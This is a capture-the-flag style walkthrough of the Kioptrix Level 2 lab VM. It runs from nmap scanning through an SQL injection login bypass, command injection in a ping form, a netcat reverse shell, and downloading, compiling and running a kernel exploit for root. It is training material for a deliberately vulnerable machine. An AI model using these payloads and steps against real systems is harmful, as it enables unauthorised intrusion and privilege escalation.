Post

Kioptrix 2 - Walkthrough

Posted Updated
By Vigneshwaran J
4 min read

image source — techyrick.com

Setup:

Download VM from this link

  1. Extract and open the VM in VMware.
  2. Issues faced that network adaptor changes to bridged automatically and not assigned any IP when you do netdiscover in kali.
  3. To overcome this, Open .vmx file in the vm folder, search for the term “bridged”, two results will be shown, delete the line of first result, and change the word “bridged” to “nat” in second result.
  4. Open the vm and use netdiscover to find the IP assigned to the kioptrix Level 2.

Find IP using netdiscover command

1

netdiscover -r 192.168.211.0/24

kioptrix IP — 192.168.211.132

Start Port scan using nmap

1

nmap -F -sV 192.168.211.132

Output

1
2
3
4
5
6
7
8
9
10
11
12
13
14

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-14 15:58 IST
Nmap scan report for 192.168.211.132
Host is up (0.0018s latency).
Not shown: 94 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:49:DE:5B (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds

1

nmap -sC -sV -O -oA initial 192.168.211.132
  • sC - run default nmap scripts -sV - detect service version -O - detect OS -oA - output all formats and store in file initial
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

# Nmap 7.93 scan initiated Sun May 14 16:00:34 2023 as: nmap -sC -sV -O -oA initial 192.168.211.132
Nmap scan report for 192.168.211.132
Host is up (0.00072s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)
|   1024 346b453dbacecab25355ef1e43703836 (DSA)
|_  1024 684d8cbbb65abd7971b87147ea004261 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            627/udp   status
|_  100024  1            630/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:49:DE:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32, Linux 2.6.9, Linux 2.6.9 - 2.6.24, Linux 2.6.9 - 2.6.30, Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 14 16:01:00 2023 -- 1 IP address (1 host up) scanned in 26.42 seconds

as we see port 80 is open, go to the chrome and put kioptrix 2 IP, to check website available for us,

There a page with username and password is shown, try basic sql injection methods,

Try - “admin’ OR 1=1 – -“ in username field, password as blank, you will get successful login

1

admin' OR 1=1 -- -

After it will redirect to a page, called Ping a Machine on the Network:, there you can put IP it will ping for us,

So lets test other command like ‘whoami’ combined with ping using semicolon ‘;’

as we see we will get output of the command we combined.

So lets make reverse shell, using Reverse shell generator using this link

Create listener using netcat - “nc -lvnp {listener port}”

Paste the code in the box, and wait for the connection

1
2
3

root@Kali# nc -lvnp 455
listening on [any] 455 ...
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.132] 33064

As we see, We got shell back

1
2
3
4
5
6
7
8
9
10

bash-3.00$ whoami
apache
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID:    CentOS
Description:    CentOS release 4.5 (Final)
Release:    4.5
Codename:    Final

So as per enum, we got centOS version, that can be exploit which leads to elevated shell, using this exploit

Headover to /tmp directory and download exploit using ‘wget’

1
2
3
4
5

bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9542
bash-3.00$ ls
9542
logwatch.miaC5174

compile useing gcc and run the exploit to get elevated root shell

1
2
3
4
5
6
7
8
9
10
11
12

bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc -o pwn 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542.c
logwatch.miaC5174
pwn
bash-3.00$ ./pwn    
sh: no job control in this shell
sh-3.00# sh-3.00# whoami
root
sh-3.00#

Thanks for the time spent

Writeups, Vulnhub
Vulnhub OSCP
This post is licensed under CC BY 4.0 by the author.